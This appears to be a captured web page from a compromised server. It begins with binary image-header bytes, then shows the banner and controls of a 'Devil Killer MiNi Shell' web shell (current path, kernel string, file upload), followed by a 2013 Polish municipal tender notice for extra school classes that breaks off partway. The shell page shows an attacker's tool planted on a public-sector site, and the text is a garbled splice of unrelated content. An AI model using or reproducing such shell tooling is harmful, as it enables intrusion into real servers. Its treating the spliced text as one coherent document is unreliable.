JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130823/341832-N-2013.html

<p class="kh_header"><b>Leszno: Zakup usług edukacyjnych na potrzeby realizacji projektu systemowego-Indywidualizacja nauczania uczniów klas I-III szkół podstawowych w Gminie Leszno, współfinansowanego ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego  - 69 części.</b><br>
<b>Numer ogłoszenia: 341832 - 2013; data zamieszczenia: 23.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Leszno , Aleja  Wojska Polskiego 21, 05-084 Leszno, woj. mazowieckie, tel. 22 7258005, 7259035, 7258452, faks 22 7258552.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.leszno.bipgminy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług edukacyjnych na potrzeby realizacji projektu systemowego-Indywidualizacja nauczania uczniów klas I-III szkół podstawowych w Gminie Leszno, współfinansowanego ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego  - 69 części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup usług edukacyjnych na potrzeby realizacji projektu systemowego - Indywidualizacja nauczania uczniów klas I-III szkół podstawowych w Gminie Leszno, współfinansowanego ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki  Priorytet IX - Działanie 9.1 -Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2 -Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych - 69 części. 
Usługi edukacyjne realizowane będą w 2 szkołach podstawowych, dla których Gmina Leszno jest organem prowadzącym, tj. w Szkole Podstawowej im Stefana Batorego w Lesznie, ul. Leśna 13 i w Szkole Podstawowej im. Powstańców 1863 Roku w Zaborowie, ul. Stołeczna 182 - w okresie od 1.10.2013r. do 30.06.2014r. 
Usługi edukacyjne będą realizowane w ramach dwóch zadań ww. Projektu:  Zadanie 1. Zajęcia dodatkowe w Szkole Podstawowej w Lesznie; Zadanie 3. Zajęcia dodatkowe w Szkole Podstawowej w Zaborowie

Zakres usługi edukacyjnej obejmuje w szczególności przeprowadzenie przez Wykonawcę dodatkowych zajęć edukacyjnych na podstawie programu i harmonogramu opracowanego przez Wykonawcę w porozumieniu z dyrektorem szkoły, w której będą odbywać się zajęcia. Wykonawca na podstawie dokumentów udostępnionych przez szkołę przygotuje program zajęć dodatkowych, dostosowany do zdiagnozowanych potrzeb uczniów i uwzględniający indywidualizację pracy z dzieckiem oraz treściami zawartymi w podstawie programowej zamieszczonej w rozporządzeniu Ministra Edukacji Narodowej z dnia 23 grudnia 2008 r. w sprawie podstawy programowej wychowania przedszkolnego oraz kształcenia ogólnego w poszczególnych typach szkół Dz. U. z dnia 15 stycznia 2009r. nr 4, poz. 17. 

Wykaz zajęć dodatkowych do realizacji:
I.	450 godzin zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, z tego: 270 godzin w Szkole Podstawowej w Lesznie, 9 grup po 30 godzin, w tym 11 godzin w roku 2013 i 19 godzin w roku 2014; 180 godzin w Szkole Podstawowej w Zaborowie, 6 grup po 30 godzin w tym 11 godzin w roku 2013 i 19 godzin w roku 2014; 
II.	330 godzin zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, z tego: 270 godzin w Szkole Podstawowej w Lesznie,  9 grup po 30 godzin w tym 11 godzin w roku 2013 i 19 godzin w roku 2014; 60 godzin w Szkole Podstawowej w Zaborowie, 2 grupy po 30 godzin w tym 11 godzin w roku 2013 i 19 godzin w roku 2014
III.	450 godzin zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy, 15 grup po 30 godzin w tym 11 godzin w roku 2013 i 19 godzin w roku 2014 w Szkole Podstawowej w Lesznie
IV.	540 godzin zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, z tego: 300 godzin w Szkole Podstawowej w Lesznie, 10 grup po 30 godzin w tym 11 godzin w roku 2013 i 19 godzin w roku 2014; 240 godzin w Szkole Podstawowej w Zaborowie, 8 grup po 30 godzin w tym 11 godzin w roku 2013 i 19 godzin w roku 2014
V.	300 godzin zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - zajęcia matematyczno-przyrodnicze, z tego: 180 godzin w Szkole Podstawowej w Lesznie, 6 grup po 30 godzin w tym 11 godzin w roku 2013 i 19 godzin w roku 2014; 120 godzin w Szkole Podstawowej w Zaborowie, 4 grupy po 30 godzin w tym 11 godzin w roku 2013 i 19 godzin w roku 2014.

Godzina zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji oraz godzina zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy trwa 60 minut. Godzina zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych oraz godzina zajęć korygujących wady postawy - trwa 45 minut. Wszystkie zajęcia będą się odbywać w szkołach bezpośrednio po obowiązkowych zajęciach edukacyjnych uczniów 
z częstotliwością 1 raz w tygodniu. 
Zamawiający w niniejszym postępowaniu dopuszcza możliwość składania ofert częściowych na wykonanie zamówienia według poniższego podziału, zgodnie z którym każda część zamówienia odpowiada jednej grupie uczestników zajęć. 
Wykaz zajęć dodatkowych do realizacji w szkołach podstawowych i podział na części przedmiotu zamówienia:

Zajęcia dodatkowe w Szkole Podstawowej w Lesznie

Część 1: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 1;
Część 2: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 2;
Część 3: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 3;
Część 4: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 4;
Część 5: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 5;
Część 6: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 6;
Część 7: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014 w Szkole Podstawowej w Lesznie, grupa 7;
Część 8: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014 w Szkole Podstawowej w Lesznie, grupa 8;
Część 9: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 9;
Część 10: przeprowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 1;
Część 11: przeprowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 2;
Część 12: przeprowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 3;
Część 13: przeprowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 4;
Część 14: przeprowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 5;
Część 15: przeprowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 6;
Część 16: przeprowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 7;
Część 17: przeprowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 8;
Część 18: przeprowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 9;
Część 19: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 1;
Część 20: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy,  liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 2;
Część 21: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy,  liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 3;
Część 22: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 4;
Część 23: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 5;
Część 24: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy,  liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 6;
Część 25: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 7;
Część 26: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 8;
Część 27: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 9;
Część 28: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014 w Szkole Podstawowej w Lesznie, grupa 10;
Część 29: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014 w Szkole Podstawowej w Lesznie, grupa 11;
Część 30: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 12;
Część 31 : przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 13;
Część 32: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 14;
Część 33: przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy,  liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 15;
Część 34: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 1;
Część 35: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 2;
Część 36: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 3;
Część 37: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 4;
Część 38:przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 5;
Część 39: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 6;
Część 40: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 7;
Część 41: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 8;
Część 42: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 9;
Część 43: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 10;
Część 44: przeprowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - zajęcia matematyczno-przyrodnicze, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 1;
Część 45: przeprowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - zajęcia matematyczno-przyrodnicze, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 2;
Część 46: przeprowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - zajęcia matematyczno-przyrodnicze, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 3;
Część 47: przeprowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - zajęcia matematyczno-przyrodnicze, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 4;
Część 48: przeprowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - zajęcia matematyczno-przyrodnicze, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 5;
Część 49: przeprowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - zajęcia matematyczno-przyrodnicze, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Lesznie, grupa 6;
Zajęcia dodatkowe w Szkole Podstawowej w Zaborowie
Część 50: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 1;
Część 51: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcj, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 2;
Część 52: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014 w Szkole Podstawowej w Zaborowie, grupa 3;
Część 53: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 4;
Część 54: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 5;
Część 55: przeprowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014 w Szkole Podstawowej w Zaborowie, grupa 6;
Część 56: przeprowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 1;
Część 57: przeprowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 2;
Część 58: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 1;
Część 59: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014 w Szkole Podstawowej w Zaborowie, grupa 2;
Część 60: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 3;
Część 61: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014 Szkole Podstawowej w Zaborowie, grupa 4;
Część 62: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 5;
Część 63: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014 Szkole Podstawowej w Zaborowie, grupa 6;
Część 64: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 7;
Część 65: przeprowadzenie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 8;
Część 66: przeprowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - zajęcia matematyczno-przyrodnicze, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 1;
Część 67: przeprowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - zajęcia matematyczno-przyrodnicze, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 2;
Część 68: przeprowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - zajęcia matematyczno-przyrodnicze, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 3;
Część 69: przeprowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - zajęcia matematyczno-przyrodnicze, liczba godzin 30, z tego 11 godzin w roku 2013 i 19 godzin w roku 2014, w Szkole Podstawowej w Zaborowie, grupa 4.


Obowiązki wykonawcy:
1. W zakresie obowiązków Wykonawcy jest: 
1) przygotowanie szczegółowego programu zajęć w formie pisemnej i przedstawienie go do zatwierdzenia dyrektorowi szkoły, w której będą realizowane zajęcia, o których mowa § 1 umowy - w terminie 7 dni od podpisania umowy oraz niezwłoczne dostarczenie go Zamawiającemu, 
2) przeprowadzenie zajęć zgodnie z programem i harmonogramem zatwierdzonym przez dyrektora szkoły, w której będą realizowane zajęcia, o których mowa § 1 umowy, 
3) niezwłoczne informowanie dyrektora szkoły o każdym przypadku uniemożliwiającym mu realizację zajęć zgodnie z harmonogramem, 
4) zapewnienie ładu i porządku w czasie zajęć, bezpieczeństwa uczniów uczestniczącym w zajęciach oraz zgodnego z przeznaczeniem użytkowania sprzętu, materiałów i pomocy dydaktycznych, 
5) bieżące dokumentowanie prowadzonych zajęć w dzienniku zajęć oraz bieżąca kontrola frekwencji i monitorowania osiągnięć uczniów, 
6) sporządzanie karty czasu pracy za każdy miesiąc i dołączanie jej do rachunku/faktury,
7) przeprowadzenie i dokonanie zbiorczej analizy ankiet ewaluacyjnych (których treść uzgodniona będzie wcześniej z dyrektorem szkoły) na pierwszych i ostatnich zajęciach w każdym kwartale i przekazanie analizy dyrektorowi w terminie 5 dni od zakończenia zajęć w danym kwartale. 
8) sporządzenie raportu z realizacji zajęć po ich zakończeniu i złożenia go dyrektorowi szkoły wraz z ostatnim rachunkiem/fakturą, 
